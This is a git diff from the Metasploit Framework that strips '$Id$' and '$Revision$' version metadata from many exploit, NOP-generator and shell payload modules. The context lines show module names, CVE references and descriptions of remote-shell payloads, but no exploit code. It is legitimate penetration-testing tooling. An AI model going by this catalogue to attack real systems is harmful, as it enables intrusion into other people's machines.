--git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index cfd7f1cc08..ee25f3e722 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1638' ], diff --git a/modules/exploits/windows/smtp/mercury_cram_md5.rb b/modules/exploits/windows/smtp/mercury_cram_md5.rb index 108f62edb4..e0379df49e 100644 --- a/modules/exploits/windows/smtp/mercury_cram_md5.rb +++ b/modules/exploits/windows/smtp/mercury_cram_md5.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4440' ], diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb index 95151dce66..f3ca211cec 100644 --- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb +++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm', # original module 'patrick', # msf3 port :) ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0714' ], diff --git a/modules/exploits/windows/smtp/njstar_smtp_bof.rb b/modules/exploits/windows/smtp/njstar_smtp_bof.rb index 2b34063831..1fec8e6545 100644 --- a/modules/exploits/windows/smtp/njstar_smtp_bof.rb +++ b/modules/exploits/windows/smtp/njstar_smtp_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Dillon Beresford', # Original discovery and MSF Module. ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '76728' ], diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index 50b342259e..7304dc55e7 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote (SMTP) via a SEH frame overwrite. }, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2287' ], diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index 9f8d39a855..881879ad99 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote jmp ebx opcode in ws_32.dll }, 'Author' => [ 'acaro ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1558'], diff --git a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb index 61079561d3..a42eb89173 100644 --- a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'riaf ', 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-2407'], diff --git a/modules/exploits/windows/ssh/freesshd_key_exchange.rb b/modules/exploits/windows/ssh/freesshd_key_exchange.rb index fe3f524f58..5fa9f4c614 100644 --- a/modules/exploits/windows/ssh/freesshd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freesshd_key_exchange.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-2407'], diff --git a/modules/exploits/windows/ssh/putty_msg_debug.rb b/modules/exploits/windows/ssh/putty_msg_debug.rb index 133f674f66..afaf7af9d9 100644 --- a/modules/exploits/windows/ssh/putty_msg_debug.rb +++ b/modules/exploits/windows/ssh/putty_msg_debug.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1359' ], diff --git a/modules/exploits/windows/ssh/securecrt_ssh1.rb b/modules/exploits/windows/ssh/securecrt_ssh1.rb index 3cb4c75ce5..6e7e125f91 100644 --- a/modules/exploits/windows/ssh/securecrt_ssh1.rb +++ b/modules/exploits/windows/ssh/securecrt_ssh1.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1059' ], diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index 0de658d54a..b192ea90ba 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0719'], diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index 6edaf84865..8a6bf3ce31 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2000-0665'], diff --git a/modules/exploits/windows/telnet/goodtech_telnet.rb b/modules/exploits/windows/telnet/goodtech_telnet.rb index 63ffaca328..6f618ab8c8 100644 --- a/modules/exploits/windows/telnet/goodtech_telnet.rb +++ b/modules/exploits/windows/telnet/goodtech_telnet.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0768' ], diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index d8eac92783..d808463791 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote request (get/write) for an overly long file name. }, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-6184'], diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index 6d51e5c78b..e58f025a3e 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'LSO ', # Exploit module 'patrick', # Refs, stability, targets etc ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1435' ], diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index cc90014957..ae741b0194 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote Windows 2000 Server (could not trigger the overflow at all). }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-1812'], diff --git a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb index 0b995bc85d..7ebf7dfd95 100644 --- a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb +++ b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote in a DoS. This is a port of a sploit by Mati "muts" Aharoni. }, 'Author' => 'Saint Patrick', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-1610'], diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index 4b0dacab5b..cd0b823724 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote execute arbitrary code on the system. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2002-2226'], diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 51a6ba6641..6acef18d24 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote an overly long file name to the tftpd.exe server, the stack can be overwritten. }, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4948' ], diff --git a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb index aad5e9d201..f433fc0071 100644 --- a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb +++ b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote arbitrary code on the system. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-6183'], diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index 6492658b65..a80d9bd0d8 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2668'], diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb index 0c54636d80..679c8198c5 100644 --- a/modules/exploits/windows/vnc/realvnc_client.rb +++ b/modules/exploits/windows/vnc/realvnc_client.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0167' ], diff --git a/modules/exploits/windows/vnc/ultravnc_client.rb b/modules/exploits/windows/vnc/ultravnc_client.rb index 4edda261bc..52c2a1c485 100644 --- a/modules/exploits/windows/vnc/ultravnc_client.rb +++ b/modules/exploits/windows/vnc/ultravnc_client.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-1652' ], diff --git a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb index 4dd150fe38..42c379d080 100644 --- a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb +++ b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'noperand', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0610' ], diff --git a/modules/exploits/windows/vnc/winvnc_http_get.rb b/modules/exploits/windows/vnc/winvnc_http_get.rb index 4603033a15..f0a0ccb507 100644 --- a/modules/exploits/windows/vnc/winvnc_http_get.rb +++ b/modules/exploits/windows/vnc/winvnc_http_get.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ require 'msf/core' }, 'Author' => 'patrick', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '2306' ], diff --git a/modules/exploits/windows/vpn/safenet_ike_11.rb b/modules/exploits/windows/vpn/safenet_ike_11.rb index f31a29102b..a769311a18 100644 --- a/modules/exploits/windows/vpn/safenet_ike_11.rb +++ b/modules/exploits/windows/vpn/safenet_ike_11.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote windows/meterpreter/reverse_ord_tcp payloads. }, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1943' ], diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index ff6ae53b57..666ca66d3d 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index b8c362841f..cb8fab4688 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1080'], diff --git a/modules/nops/armle/simple.rb b/modules/nops/armle/simple.rb index 51bc94484e..29dd960512 100644 --- a/modules/nops/armle/simple.rb +++ b/modules/nops/armle/simple.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Nop super( 'Name' => 'Simple', 'Alias' => 'armle_simple', - 'Version' => '$Revision$', 'Description' => 'Simple NOP generator', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/nops/nop_test.rb.ut.rb b/modules/nops/nop_test.rb.ut.rb index 272f475742..17a5a201ad 100644 --- a/modules/nops/nop_test.rb.ut.rb +++ b/modules/nops/nop_test.rb.ut.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/nops/php/generic.rb b/modules/nops/php/generic.rb index e97b5683f1..a6d39d39c1 100644 --- a/modules/nops/php/generic.rb +++ b/modules/nops/php/generic.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Nop super( 'Name' => 'PHP Nop Generator', 'Alias' => 'php_generic', - 'Version' => '$Revision$', 'Description' => 'Generates harmless padding for PHP scripts', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index 246a7ad2e4..ae5b9edc0b 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Nop super( 'Name' => 'Simple', 'Alias' => 'ppc_simple', - 'Version' => '$Revision$', 'Description' => 'Simple NOP generator', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index 41856b584b..1732cc8597 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -81,7 +77,6 @@ class Metasploit3 < Msf::Nop super( 'Name' => 'SPARC NOP Generator', 'Alias' => 'sparc_simple', - 'Version' => '$Revision$', 'Description' => 'SPARC NOP generator', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/nops/tty/generic.rb b/modules/nops/tty/generic.rb index 2a94cc5ea0..99bb3e498a 100644 --- a/modules/nops/tty/generic.rb +++ b/modules/nops/tty/generic.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Nop super( 'Name' => 'TTY Nop Generator', 'Alias' => 'tty_generic', - 'Version' => '$Revision$', 'Description' => 'Generates harmless padding for TTY input', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/nops/x64/simple.rb b/modules/nops/x64/simple.rb index 00c2b22d4c..b475feffb3 100644 --- a/modules/nops/x64/simple.rb +++ b/modules/nops/x64/simple.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Nop super( 'Name' => 'Simple', 'Alias' => 'x64_simple', - 'Version' => '$Revision$', 'Description' => 'An x64 single/multi byte NOP instruction generator.', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index c095ff099f..7ec5abe9cf 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Nop def initialize super( 'Name' => 'Opty2', - 'Version' => '$Revision$', 'Description' => 'Opty2 multi-byte NOP generator', 'Author' => [ 'spoonm', 'optyx' ], 'License' => MSF_LICENSE, diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index 0cc248d47c..e362e4f33e 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -88,7 +84,6 @@ SINGLE_BYTE_SLED = super( 'Name' => 'Single Byte', 'Alias' => 'ia32_singlebyte', - 'Version' => '$Revision$', 'Description' => 'Single-byte NOP generator', 'Author' => 'spoonm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb index 207588a7f9..b66f76ab28 100644 --- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'AIX Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/aix/ppc/shell_find_port.rb b/modules/payloads/singles/aix/ppc/shell_find_port.rb index 36a74b3b33..457e8c7d20 100644 --- a/modules/payloads/singles/aix/ppc/shell_find_port.rb +++ b/modules/payloads/singles/aix/ppc/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'AIX Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/aix/ppc/shell_interact.rb b/modules/payloads/singles/aix/ppc/shell_interact.rb index 39d0715bfe..39c6f55acc 100644 --- a/modules/payloads/singles/aix/ppc/shell_interact.rb +++ b/modules/payloads/singles/aix/ppc/shell_interact.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'AIX execve shell for inetd', - 'Version' => '$Revision$', 'Description' => 'Simply execve /bin/sh (for inetd programs)', 'Author' => 'jduck', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb index e40599da01..bfd0c3da16 100644 --- a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'AIX Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb index 0f1034d57d..9ec4d4f7e0 100644 --- a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb index ff302dfe23..0b154a7178 100644 --- a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/exec.rb b/modules/payloads/singles/bsd/x86/exec.rb index 5881af1ec1..7c75882773 100644 --- a/modules/payloads/singles/bsd/x86/exec.rb +++ b/modules/payloads/singles/bsd/x86/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => 'vlad902', 'License' => MSF_LICENSE, @@ -54,7 +49,6 @@ module Metasploit3 ; Name: single_exec ; Platforms: *BSD ; Author: vlad902 -; Version: $Revision$ ; License: ; ; This file is part of the Metasploit Exploit Framework diff --git a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb index 6c6a2988d0..0e6a470ab3 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'FreeBSD Meterpreter Service, Bind TCP', - 'Version' => '$Revision$', 'Description' => 'Stub payload for interacting with a Meterpreter Service', 'Author' => 'hdm', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb index 5119baaac0..3e163e398a 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'FreeBSD Meterpreter Service, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Stub payload for interacting with a Meterpreter Service', 'Author' => 'hdm', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb index 9e624ec85c..07a58c0f0a 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ 